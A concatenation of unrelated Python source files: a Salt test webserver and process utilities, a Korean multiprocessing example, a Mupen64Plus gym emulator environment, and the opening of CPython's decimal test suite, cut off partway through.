        webserver = Webserver('/path/to/web/root')
        webserver.start()
        webserver.stop()
    '''
    def __init__(self,
                 root=None,
                 port=None,
                 wait=5,
                 handler=None):
        '''
        root
            Root directory of webserver. If not passed, it will default to the
            location of the base environment of the integration suite's file
            roots (tests/integration/files/file/base/)
        port
            Port on which to listen. If not passed, a random one will be chosen
            at the time the start() function is invoked.
        wait : 5
            Number of seconds to wait for the socket to be open before raising
            an exception
        handler
            Can be used to use a subclass of tornado.web.StaticFileHandler,
            such as when enforcing authentication with the http_basic_auth
            decorator.
        '''
        if port is not None and not isinstance(port, six.integer_types):
            raise ValueError('port must be an integer')
        if root is None:
            root = os.path.join(FILES, 'file', 'base')
        try:
            self.root = os.path.realpath(root)
        except AttributeError:
            # os.path.realpath blew up on a non-string root
            raise ValueError('root must be a string')
        self.port = port
        self.wait = wait
        self.handler = handler \
            if handler is not None \
            else tornado.web.StaticFileHandler
        # Filled in by start(); None means "not started yet"
        self.web_root = None

    def target(self):
        '''
        Threading target which stands up the tornado application
        '''
        # Runs in the server thread started by start(); blocks in
        # ioloop.start() until stop() schedules ioloop.stop()
        self.ioloop = tornado.ioloop.IOLoop()
        self.ioloop.make_current()
        self.application = tornado.web.Application(
            [(r'/(.*)', self.handler, {'path': self.root})])
        self.application.listen(self.port)
        self.ioloop.start()

    @property
    def listening(self):
        # True once a TCP connection to the configured port succeeds.
        # NOTE(review): the probe socket is never closed, so each poll leaks
        # one file descriptor until garbage collection -- confirm upstream.
        if self.port is None:
            return False
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        return sock.connect_ex(('127.0.0.1', self.port)) == 0

    def url(self, path):
        '''
        Convenience function which, given a file path, will return a URL that
        points to that path. If the path is relative, it will just be appended
        to self.web_root.
        '''
        if self.web_root is None:
            raise RuntimeError('Webserver instance has not been started')
        err_msg = 'invalid path, must be either a relative path or a path ' \
                  'within {0}'.format(self.root)
        try:
            relpath = path \
                if not os.path.isabs(path) \
                else os.path.relpath(path, self.root)
            if relpath.startswith('..' + os.sep):
                # Absolute path escaping the web root
                raise ValueError(err_msg)
            return '/'.join((self.web_root, relpath))
        except AttributeError:
            # path was not a string
            raise ValueError(err_msg)

    def start(self):
        '''
        Starts the webserver
        '''
        if self.port is None:
            self.port = get_unused_localhost_port()
        self.web_root = 'http://127.0.0.1:{0}'.format(self.port)
        self.server_thread = threading.Thread(target=self.target)
        self.server_thread.daemon = True
        self.server_thread.start()
        # Poll once per second for up to self.wait seconds; the for-else
        # raises only when the loop completes without ever seeing the
        # server listening.
        for idx in range(self.wait + 1):
            if self.listening:
                break
            if idx != self.wait:
                time.sleep(1)
        else:
            raise Exception(
                'Failed to start tornado webserver on 127.0.0.1:{0} within '
                '{1} seconds'.format(self.port, self.wait)
            )

    def stop(self):
        '''
        Stops the webserver
        '''
        # Schedule the stop on the server thread's own IOLoop, then wait
        # for the thread to exit
        self.ioloop.add_callback(self.ioloop.stop)
        self.server_thread.join()
def win32_kill_process_tree(pid, sig=signal.SIGTERM, include_parent=True,
                            timeout=None, on_terminate=None):
    '''
    Send signal *sig* to every process in the tree rooted at *pid*
    (children and grandchildren, plus the parent itself when
    *include_parent* is true) and return a ``(gone, still_alive)`` tuple.
    *on_terminate*, if given, is a callback invoked as each child exits.
    '''
    # Refuse to signal our own process tree.
    if pid == os.getpid():
        raise RuntimeError("I refuse to kill myself")
    try:
        parent = psutil.Process(pid)
    except psutil.NoSuchProcess:
        log.debug("PID not found alive: %d", pid)
        return ([], [])
    targets = parent.children(recursive=True)
    if include_parent:
        targets.append(parent)
    for proc in targets:
        proc.send_signal(sig)
    gone, alive = psutil.wait_procs(targets, timeout=timeout,
                                    callback=on_terminate)
    return (gone, alive)
def this_user():
    '''
    Return the username that owns the current process.
    '''
    if not salt.utils.platform.is_windows():
        # POSIX: resolve the username from the real uid via the passwd db.
        return pwd.getpwuid(os.getuid())[0]
    return salt.utils.win_functions.get_current_user(with_domain=False)
def dedent(text, linesep=os.linesep):
    '''
    Dedent *text* with textwrap.dedent and normalize its line endings to
    *linesep*. Returns bytes when *text* was bytes, otherwise text.
    '''
    sep = salt.utils.stringutils.to_unicode(linesep)
    dedented = textwrap.dedent(salt.utils.stringutils.to_unicode(text))
    normalized = sep.join(dedented.splitlines())
    # splitlines() drops a trailing newline; restore it with the chosen sep.
    if dedented.endswith(u'\n'):
        normalized += sep
    if isinstance(text, six.text_type):
        return normalized
    return salt.utils.stringutils.to_bytes(normalized)
|
Ex11_multiprocessing.py | """
Historically, Python exposed process-handling functions and methods across
several modules, with a lot of duplication between them.
The multiprocessing module was designed later than the thread module.
For parallel work, this code uses the multiprocessing module rather than threads.
multiprocessing offers an API similar to the threading module,
but it uses subprocesses instead of threads, effectively working around the
Global Interpreter Lock. It runs on both Unix-like systems and Windows.
import os
import multiprocessing
def func(tname):
    '''Print the current process id together with the supplied tag.'''
    pid_label = '프로세스 %s : ' % (os.getpid())
    print(pid_label, tname)
if __name__ == '__main__':
    # Run once in the parent (main) process first.
    func('나는 메인')
    # Spawn four child processes, each running func() in its own interpreter.
    # Without join() below, the parent does not wait for them to finish, so
    # '메인종료' may print before (or interleaved with) the children's output.
    for n in range(4):
        p = multiprocessing.Process(target=func, args=('나는 별도의 프로세스',))
        p.start()
        # p.join()  # to check later (original note: 추후에 확인)
    print('메인종료')
|
mupen64plus_env.py | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import abc
import array
import inspect
import itertools
import json
import os
import subprocess
import threading
import time
from termcolor import cprint
import yaml
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import numpy as np
import mss
###############################################
class ImageHelper:
    '''Small helper for reading pixel values out of captured frame arrays.'''

    def GetPixelColor(self, image_array, x, y):
        '''Return the (red, green, blue) tuple at column *x*, row *y*.'''
        pixel = image_array[y][x]
        return (pixel[0], pixel[1], pixel[2])
###############################################
### Variables & Constants ###
###############################################

# Load config.yml sitting next to this module. The path is resolved from the
# call stack so it works regardless of the current working directory.
config = yaml.safe_load(open(os.path.join(os.path.dirname(inspect.stack()[0][1]), "config.yml")))

# One millisecond expressed in seconds, used as the time.sleep() granularity
# for the controller-server busy-wait loops below.
MILLISECOND = 1.0 / 1000.0

# Shared helper instance for pixel lookups on captured frames.
IMAGE_HELPER = ImageHelper()

###############################################
class Mupen64PlusEnv(gym.Env):
    '''
    Abstract gym environment that drives a Mupen64Plus emulator instance.

    The base class owns the emulator (and optional Xvfb) subprocesses, the
    controller HTTP server that feeds input to the emulator's input driver,
    and screen capture via mss. Subclasses supply the game-specific pieces:
    _navigate_menu, _get_reward, _evaluate_end_state and _reset.
    '''
    __metaclass__ = abc.ABCMeta
    metadata = {'render.modes': ['human']}

    def __init__(self, rom_name):
        '''Start the controller server and the emulator running *rom_name*.'''
        self.viewer = None
        self.reset_count = 0
        self.step_count = 0
        self.running = True
        self.mss_grabber = None
        self.episode_over = False
        self.numpy_array = None
        self.controller_server, self.controller_server_thread = self._start_controller_server()
        self.xvfb_process, self.emulator_process = self._start_emulator(rom_name=rom_name)
        self._navigate_menu()

        # Observations are raw screen frames (H x W x D, values 0..255).
        self.observation_space = \
            spaces.Box(low=0, high=255, shape=(config['SCR_H'], config['SCR_W'], config['SCR_D']))

        self.action_space = spaces.MultiDiscrete([[-80, 80], # Joystick X-axis
                                                  [-80, 80], # Joystick Y-axis
                                                  [0, 1], # A Button
                                                  [0, 1], # B Button
                                                  [0, 1]]) # RB Button

    def _step(self, action):
        '''Apply *action* for one frame; return (obs, reward, done, info).'''
        #cprint('Step %i: %s' % (self.step_count, action), 'green')
        self._act(action)
        obs = self._observe()
        self.episode_over = self._evaluate_end_state()
        reward = self._get_reward()

        self.step_count += 1
        return obs, reward, self.episode_over, {}

    def _act(self, action, count=1):
        '''Send *action* to the controller server *count* times.'''
        for _ in itertools.repeat(None, count):
            self.controller_server.send_controls(action)

    def _wait(self, count=1, wait_for='Unknown'):
        '''Hold NO_OP input for *count* frames; *wait_for* is a label only.'''
        self._act(ControllerState.NO_OP, count=count)

    def _press_button(self, button):
        '''Press *button* for one frame, then release it.'''
        self._act(button) # Press
        self._act(ControllerState.NO_OP) # and release

    def _observe(self):
        '''Grab the current emulator frame as an RGB uint8 numpy array.'''
        #cprint('Observe called!', 'yellow')

        # Under Xvfb the virtual display starts at (0, 0); otherwise the
        # configured offsets locate the emulator window on the real display.
        if config['USE_XVFB']:
            offset_x = 0
            offset_y = 0
        else:
            offset_x = config['OFFSET_X']
            offset_y = config['OFFSET_Y']

        image_array = \
            np.array(self.mss_grabber.grab({"top": offset_y,
                                            "left": offset_x,
                                            "width": config['SCR_W'],
                                            "height": config['SCR_H']}),
                     dtype=np.uint8)

        # drop the alpha channel and flip red and blue channels (BGRA -> RGB)
        self.numpy_array = \
            np.flip(image_array[:, :, :3], 2)

        return self.numpy_array

    @abc.abstractmethod
    def _navigate_menu(self):
        '''Drive the game's menus to the start of an episode (game-specific).'''
        return

    @abc.abstractmethod
    def _get_reward(self):
        '''Return the reward for the current frame (game-specific).'''
        #cprint('Get Reward called!', 'yellow')
        return 0

    @abc.abstractmethod
    def _evaluate_end_state(self):
        '''Return True when the episode is over (game-specific).'''
        #cprint('Evaluate End State called!', 'yellow')
        return False

    @abc.abstractmethod
    def _reset(self):
        '''Reset episode counters; subclasses restart the game itself.'''
        cprint('Reset called!', 'yellow')
        self.reset_count += 1

        self.step_count = 0
        return self._observe()

    def _render(self, mode='human', close=False):
        '''Show (mode='human') or return (mode='rgb_array') the last frame.'''
        if close:
            if self.viewer is not None:
                self.viewer.close()
                self.viewer = None
            return

        img = self.numpy_array

        if mode == 'rgb_array':
            return img
        elif mode == 'human':
            # Lazy import: the classic_control viewer needs a display.
            from gym.envs.classic_control import rendering
            if self.viewer is None:
                self.viewer = rendering.SimpleImageViewer()
            self.viewer.imshow(img)

    def _close(self):
        '''Shut down the emulator and the controller server.'''
        cprint('Close called!', 'yellow')
        self.running = False
        self._kill_emulator()
        self._stop_controller_server()

    def _start_controller_server(self):
        '''Start the controller HTTP server on a daemon thread.'''
        server = ControllerHTTPServer(('', config['PORT_NUMBER']),
                                      config['ACTION_TIMEOUT'])
        server_thread = threading.Thread(target=server.serve_forever, args=())
        server_thread.daemon = True
        server_thread.start()
        print('ControllerHTTPServer started on port ', config['PORT_NUMBER'])
        return server, server_thread

    def _stop_controller_server(self):
        '''Stop the controller HTTP server if it was started.'''
        #cprint('Stop Controller Server called!', 'yellow')
        if hasattr(self, 'controller_server'):
            self.controller_server.shutdown()

    def _start_emulator(self,
                        rom_name,
                        res_w=config['SCR_W'],
                        res_h=config['SCR_H'],
                        res_d=config['SCR_D'],
                        input_driver_path=config['INPUT_DRIVER_PATH']):
        '''
        Launch mupen64plus (optionally inside a fresh Xvfb display) and return
        the (xvfb_process, emulator_process) pair. xvfb_process is None when
        USE_XVFB is disabled. Raises Exception when the ROM, the input driver
        or an Xvfb display cannot be found.
        '''
        rom_path = os.path.abspath(
            os.path.join(os.path.dirname(inspect.stack()[0][1]),
                         '../ROMs',
                         rom_name))

        if not os.path.isfile(rom_path):
            msg = "ROM not found: " + rom_path
            cprint(msg, 'red')
            raise Exception(msg)

        input_driver_path = os.path.abspath(os.path.expanduser(input_driver_path))
        if not os.path.isfile(input_driver_path):
            msg = "Input driver not found: " + input_driver_path
            cprint(msg, 'red')
            raise Exception(msg)

        cmd = [config['MUPEN_CMD'],
               "--resolution",
               "%ix%i" % (res_w, res_h),
               "--audio", "dummy",
               "--input",
               input_driver_path,
               rom_path]

        # Remember the caller's DISPLAY so it can be restored afterwards.
        initial_disp = os.environ["DISPLAY"]
        cprint('Initially on DISPLAY %s' % initial_disp, 'red')

        xvfb_proc = None
        if config['USE_XVFB']:
            display_num = 0
            success = False

            # If we couldn't find an open display number after 15 attempts, give up
            while not success and display_num <= 15:
                display_num += 1
                xvfb_cmd = [config['XVFB_CMD'],
                            ":" + str(display_num),
                            "-screen",
                            "0",
                            "%ix%ix%i" % (res_w, res_h, res_d * 8),
                            "-fbdir",
                            config['TMP_DIR']]

                cprint('Starting xvfb with command: %s' % xvfb_cmd, 'yellow')

                xvfb_proc = subprocess.Popen(xvfb_cmd, shell=False, stderr=subprocess.STDOUT)

                time.sleep(2) # Give xvfb a couple seconds to start up

                # Poll the process to see if it exited early
                # (most likely due to a server already active on the display_num)
                if xvfb_proc.poll() is None:
                    success = True

                print('')

            if not success:
                msg = "Failed to initialize Xvfb!"
                cprint(msg, 'red')
                raise Exception(msg)

            os.environ["DISPLAY"] = ":" + str(display_num)
            cprint('Using DISPLAY %s' % os.environ["DISPLAY"], 'blue')
            cprint('Changed to DISPLAY %s' % os.environ["DISPLAY"], 'red')

            # Run the emulator through VirtualGL so it renders on the Xvfb display.
            cmd = [config['VGLRUN_CMD']] + cmd

        cprint('Starting emulator with comand: %s' % cmd, 'yellow')
        emulator_process = subprocess.Popen(cmd,
                                            env=os.environ.copy(),
                                            shell=False,
                                            stderr=subprocess.STDOUT)

        # TODO: Test and cleanup:
        # May need to initialize this after the DISPLAY env var has been set
        # so it attaches to the correct X display; otherwise screenshots may
        # come from the wrong place. This used to be true when we were using
        # wxPython for screenshots. Untested after switching to mss.
        cprint('Calling mss.mss() with DISPLAY %s' % os.environ["DISPLAY"], 'red')
        self.mss_grabber = mss.mss()
        time.sleep(2) # Give mss a couple seconds to initialize; also may not be necessary

        # Restore the DISPLAY env var
        os.environ["DISPLAY"] = initial_disp
        cprint('Changed back to DISPLAY %s' % os.environ["DISPLAY"], 'red')

        # Watch the emulator process on a daemon thread so an unexpected exit
        # is at least reported (see EmulatorMonitor below).
        emu_mon = EmulatorMonitor()
        monitor_thread = threading.Thread(target=emu_mon.monitor_emulator,
                                          args=[emulator_process])
        monitor_thread.daemon = True
        monitor_thread.start()

        return xvfb_proc, emulator_process

    def _kill_emulator(self):
        '''Kill the emulator (and Xvfb) subprocesses if they were started.'''
        #cprint('Kill Emulator called!', 'yellow')
        try:
            self._act(ControllerState.NO_OP)
            if self.emulator_process is not None:
                self.emulator_process.kill()
            if self.xvfb_process is not None:
                self.xvfb_process.terminate()
        except AttributeError:
            pass # We may be shut down during intialization before these attributes have been set
###############################################
class EmulatorMonitor:
    '''Watches an emulator subprocess and reports when it exits.'''

    def monitor_emulator(self, emulator):
        '''Block until *emulator* terminates, polling every two seconds.'''
        return_code = emulator.poll()
        while return_code is None:
            time.sleep(2)
            return_code = emulator.poll()

        # TODO: this means our environment died... need to die too
        print('Emulator closed with code: ' + str(return_code))
###############################################
class ControllerState(object):
    '''
    One frame of N64 controller input.

    The *controls* list is ordered [X_AXIS, Y_AXIS, A, B, RB]; the class
    attributes below provide canned vectors for common inputs.
    '''

    # Controls
    NO_OP = [0, 0, 0, 0, 0]
    A_BUTTON = [0, 0, 1, 0, 0]
    B_BUTTON = [0, 0, 0, 1, 0]
    RB_BUTTON = [0, 0, 0, 0, 1]
    JOYSTICK_UP = [0, 80, 0, 0, 0]
    JOYSTICK_DOWN = [0, -80, 0, 0, 0]
    JOYSTICK_LEFT = [-80, 0, 0, 0, 0]
    JOYSTICK_RIGHT = [80, 0, 0, 0, 0]

    def __init__(self, controls=NO_OP, start_button=0):
        # Attribute assignment order is preserved deliberately: to_json()
        # serializes __dict__, and insertion order determines key order.
        self.START_BUTTON = start_button
        self.X_AXIS, self.Y_AXIS = controls[0], controls[1]
        self.A_BUTTON, self.B_BUTTON = controls[2], controls[3]
        self.R_TRIG = controls[4]
        self.L_TRIG = 0
        self.Z_TRIG = 0

    def to_json(self):
        '''Serialize this controller state as a JSON object string.'''
        return json.dumps(self.__dict__)
###############################################
class ControllerHTTPServer(HTTPServer, object):
    '''
    HTTP server that hands controller states to the emulator's input driver.

    The handshake works via two flags: send_controls() publishes a new state
    and clears hold_response; the request handler's do_GET, which has been
    busy-waiting on hold_response, then writes the state to the client and
    sets hold_response back, releasing send_controls().
    '''

    def __init__(self, server_address, control_timeout):
        # control_timeout: max seconds send_controls() blocks waiting for the
        # input driver to fetch the pending controls.
        self.control_timeout = control_timeout
        self.controls = ControllerState()
        self.hold_response = True
        self.running = True
        super(ControllerHTTPServer, self).__init__(server_address, self.ControllerRequestHandler)

    def send_controls(self, controls, start_button=0):
        '''Publish *controls* and block until fetched or timed out.'''
        #print('Send controls called')
        self.controls = ControllerState(controls, start_button)
        self.hold_response = False

        # Wait for controls to be sent:
        start = time.time()
        while not self.hold_response and time.time() < start + self.control_timeout:
            time.sleep(MILLISECOND)

    def shutdown(self):
        '''Mark the server stopped (releases waiting do_GET loops) and shut down.'''
        self.running = False
        super(ControllerHTTPServer, self).shutdown()

    class ControllerRequestHandler(BaseHTTPRequestHandler, object):

        def log_message(self, format, *args):
            # Silence the default per-request stderr logging.
            pass

        def write_response(self, resp_code, resp_data):
            '''Write a plain-text HTTP response with status *resp_code*.'''
            self.send_response(resp_code)
            self.send_header("Content-type", "text/plain")
            self.end_headers()
            self.wfile.write(resp_data)

        def do_GET(self):
            '''Block until new controls are published, then return them.'''
            while self.server.running and self.server.hold_response:
                time.sleep(MILLISECOND)

            if not self.server.running:
                print('Sending SHUTDOWN response')
                # TODO: This sometimes fails with a broken pipe because
                # the emulator has already stopped. Should handle gracefully
                self.write_response(500, "SHUTDOWN")

            # NOTE(review): after the SHUTDOWN branch above, execution still
            # falls through and writes a second (200) response — confirm this
            # is intended before relying on the shutdown behavior.
            ### respond with controller output
            self.write_response(200, self.server.controls.to_json())
            self.server.hold_response = True
            return
###############################################
|
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import inspect
import threading
# Two decimal implementations, imported side by side so each test class can
# target either one. C is None when the _decimal extension is unavailable.
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']

# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal

# Useful Test Constant
# Maps each implementation to the tuple of its signal (flag) classes.
Signals = {
  C: tuple(C.getcontext().flags.keys()) if C else None,
  P: tuple(P.getcontext().flags.keys())
}

# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
  C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
      C.Overflow, C.DivisionByZero, C.InvalidOperation,
      C.FloatOperation] if C else None,
  P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
      P.Overflow, P.DivisionByZero, P.InvalidOperation,
      P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
    '''Assert that exactly the signals in *expected* are set in context.<attr>.'''
    flags = getattr(context, attr)
    ok = all(flags[sig] if sig in expected else not flags[sig] for sig in flags)
    cls.assertTrue(ok)
# Rounding-mode constants, taken from the pure-Python module (the C module
# uses the same string values, so these work with both implementations).
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP

# All rounding modes, for tests that iterate over every mode.
RoundingModes = [
  ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
  ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
  ROUND_05UP
]

# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
  C: C.getcontext().copy() if C else None,
  P: P.getcontext().copy()
}
def init(m):
    '''Install the default test context on decimal module *m* (no-op if None).'''
    if not m:
        return
    default_context = m.Context(
        prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
    )
    m.setcontext(default_context)
# Locate the IBM .decTest data files relative to this script/module.
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
    file = sys.argv[0]
else:
    file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep

# Skip the data-driven IBM tests entirely when the data directory is absent.
skip_expected = not os.path.isdir(directory)

# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False

# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
  EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
  EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
    """Class which tests the Decimal class against the IBM test cases."""

    def setUp(self):
        # Fresh contexts per test; readcontext is widened in read_unlimited().
        self.context = self.decimal.Context()
        self.readcontext = self.decimal.Context()
        self.ignore_list = ['#']

        # List of individual .decTest test ids that correspond to tests that
        # we're skipping for one reason or another.
        self.skipped_test_ids = set([
            # Skip implementation-specific scaleb tests.
            'scbx164',
            'scbx165',

            # For some operations (currently exp, ln, log10, power), the decNumber
            # reference implementation imposes additional restrictions on the context
            # and operands. These restrictions are not part of the specification;
            # however, the effect of these restrictions does show up in some of the
            # testcases. We skip testcases that violate these restrictions, since
            # Decimal behaves differently from decNumber for these testcases so these
            # testcases would otherwise fail.
            'expx901',
            'expx902',
            'expx903',
            'expx905',
            'lnx901',
            'lnx902',
            'lnx903',
            'lnx905',
            'logx901',
            'logx902',
            'logx903',
            'logx905',
            'powx1183',
            'powx1184',
            'powx4001',
            'powx4002',
            'powx4003',
            'powx4005',
            'powx4008',
            'powx4010',
            'powx4012',
            'powx4014',
            ])

        if self.decimal == C:
            # status has additional Subnormal, Underflow
            self.skipped_test_ids.add('pwsx803')
            self.skipped_test_ids.add('pwsx805')
            # Correct rounding (skipped for decNumber, too)
            self.skipped_test_ids.add('powx4302')
            self.skipped_test_ids.add('powx4303')
            self.skipped_test_ids.add('powx4342')
            self.skipped_test_ids.add('powx4343')
            # http://bugs.python.org/issue7049
            self.skipped_test_ids.add('pwmx325')
            self.skipped_test_ids.add('pwmx326')

        # Map test directives to setter functions.
        self.ChangeDict = {'precision' : self.change_precision,
                           'rounding' : self.change_rounding_method,
                           'maxexponent' : self.change_max_exponent,
                           'minexponent' : self.change_min_exponent,
                           'clamp' : self.change_clamp}

        # Name adapter to be able to change the Decimal and Context
        # interface without changing the test files from Cowlishaw.
        self.NameAdapter = {'and':'logical_and',
                            'apply':'_apply',
                            'class':'number_class',
                            'comparesig':'compare_signal',
                            'comparetotal':'compare_total',
                            'comparetotmag':'compare_total_mag',
                            'copy':'copy_decimal',
                            'copyabs':'copy_abs',
                            'copynegate':'copy_negate',
                            'copysign':'copy_sign',
                            'divideint':'divide_int',
                            'invert':'logical_invert',
                            'iscanonical':'is_canonical',
                            'isfinite':'is_finite',
                            'isinfinite':'is_infinite',
                            'isnan':'is_nan',
                            'isnormal':'is_normal',
                            'isqnan':'is_qnan',
                            'issigned':'is_signed',
                            'issnan':'is_snan',
                            'issubnormal':'is_subnormal',
                            'iszero':'is_zero',
                            'maxmag':'max_mag',
                            'minmag':'min_mag',
                            'nextminus':'next_minus',
                            'nextplus':'next_plus',
                            'nexttoward':'next_toward',
                            'or':'logical_or',
                            'reduce':'normalize',
                            'remaindernear':'remainder_near',
                            'samequantum':'same_quantum',
                            'squareroot':'sqrt',
                            'toeng':'to_eng_string',
                            'tointegral':'to_integral_value',
                            'tointegralx':'to_integral_exact',
                            'tosci':'to_sci_string',
                            'xor':'logical_xor'}

        # Map test-case names to roundings.
        self.RoundingDict = {'ceiling' : ROUND_CEILING,
                             'down' : ROUND_DOWN,
                             'floor' : ROUND_FLOOR,
                             'half_down' : ROUND_HALF_DOWN,
                             'half_even' : ROUND_HALF_EVEN,
                             'half_up' : ROUND_HALF_UP,
                             'up' : ROUND_UP,
                             '05up' : ROUND_05UP}

        # Map the test cases' error names to the actual errors.
        self.ErrorNames = {'clamped' : self.decimal.Clamped,
                           'conversion_syntax' : self.decimal.InvalidOperation,
                           'division_by_zero' : self.decimal.DivisionByZero,
                           'division_impossible' : self.decimal.InvalidOperation,
                           'division_undefined' : self.decimal.InvalidOperation,
                           'inexact' : self.decimal.Inexact,
                           'invalid_context' : self.decimal.InvalidOperation,
                           'invalid_operation' : self.decimal.InvalidOperation,
                           'overflow' : self.decimal.Overflow,
                           'rounded' : self.decimal.Rounded,
                           'subnormal' : self.decimal.Subnormal,
                           'underflow' : self.decimal.Underflow}

        # The following functions return True/False rather than a
        # Decimal instance.
        self.LogicalFunctions = ('is_canonical',
                                 'is_finite',
                                 'is_infinite',
                                 'is_nan',
                                 'is_normal',
                                 'is_qnan',
                                 'is_signed',
                                 'is_snan',
                                 'is_subnormal',
                                 'is_zero',
                                 'same_quantum')

    def read_unlimited(self, v, context):
        """Work around the limitations of the 32-bit _decimal version. The
        guaranteed maximum values for prec, Emax etc. are 425000000,
        but higher values usually work, except for rare corner cases.
        In particular, all of the IBM tests pass with maximum values
        of 1070000000."""
        if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
            self.readcontext._unsafe_setprec(1070000000)
            self.readcontext._unsafe_setemax(1070000000)
            self.readcontext._unsafe_setemin(-1070000000)
            return self.readcontext.create_decimal(v)
        else:
            return self.decimal.Decimal(v, context)

    def eval_file(self, file):
        """Run every test line in the .decTest file at path *file*."""
        global skip_expected
        if skip_expected:
            raise unittest.SkipTest
        with open(file) as f:
            for line in f:
                line = line.replace('\r\n', '').replace('\n', '')
                #print line
                try:
                    t = self.eval_line(line)
                except self.decimal.DecimalException as exception:
                    #Exception raised where there shouldn't have been one.
                    self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)

    def eval_line(self, s):
        """Strip comments from line *s* and dispatch it as a directive or equation."""
        if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith('  --'):
            s = (s.split('->')[0] + '->' +
                 s.split('->')[1].split('--')[0]).strip()
        else:
            s = s.split('--')[0].strip()

        for ignore in self.ignore_list:
            if s.find(ignore) >= 0:
                #print s.split()[0], 'NotImplemented--', ignore
                return
        if not s:
            return
        elif ':' in s:
            return self.eval_directive(s)
        else:
            return self.eval_equation(s)

    def eval_directive(self, s):
        """Apply a 'name: value' directive to the current test context."""
        funct, value = (x.strip().lower() for x in s.split(':'))
        if funct == 'rounding':
            value = self.RoundingDict[value]
        else:
            try:
                value = int(value)
            except ValueError:
                pass

        funct = self.ChangeDict.get(funct, (lambda *args: None))
        funct(value)

    def eval_equation(self, s):
        """Parse and execute one 'id op operands -> result signals' test line."""
        if not TEST_ALL and random.random() < 0.90:
            return

        self.context.clear_flags()

        try:
            Sides = s.split('->')
            L = Sides[0].strip().split()
            id = L[0]
            if DEBUG:
                print("Test ", id, end=" ")
            funct = L[1].lower()
            valstemp = L[2:]
            L = Sides[1].strip().split()
            ans = L[0]
            exceptions = L[1:]
        except (TypeError, AttributeError, IndexError):
            raise self.decimal.InvalidOperation
        def FixQuotes(val):
            # Unquote operands while preserving escaped quotes ('' and "").
            val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
            val = val.replace("'", '').replace('"', '')
            val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
            return val

        if id in self.skipped_test_ids:
            return

        fname = self.NameAdapter.get(funct, funct)
        if fname == 'rescale':
            return
        funct = getattr(self.context, fname)
        vals = []
        conglomerate = ''
        quote = 0
        theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]

        for exception in Signals[self.decimal]:
            self.context.traps[exception] = 1 #Catch these bugs...
        for exception in theirexceptions:
            self.context.traps[exception] = 0
        for i, val in enumerate(valstemp):
            if val.count("'") % 2 == 1:
                quote = 1 - quote
            if quote:
                conglomerate = conglomerate + ' ' + val
                continue
            else:
                val = conglomerate + val
                conglomerate = ''
            v = FixQuotes(val)
            if fname in ('to_sci_string', 'to_eng_string'):
                if EXTENDEDERRORTEST:
                    for error in theirexceptions:
                        self.context.traps[error] = 1
                        try:
                            funct(self.context.create_decimal(v))
                        except error:
                            pass
                        except Signals[self.decimal] as e:
                            self.fail("Raised %s in %s when %s disabled" % \
                                      (e, s, error))
                        else:
                            self.fail("Did not raise %s in %s" % (error, s))
                        self.context.traps[error] = 0
                v = self.context.create_decimal(v)
            else:
                v = self.read_unlimited(v, self.context)
            vals.append(v)

        ans = FixQuotes(ans)

        if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
            for error in theirexceptions:
                self.context.traps[error] = 1
                try:
                    funct(*vals)
                except error:
                    pass
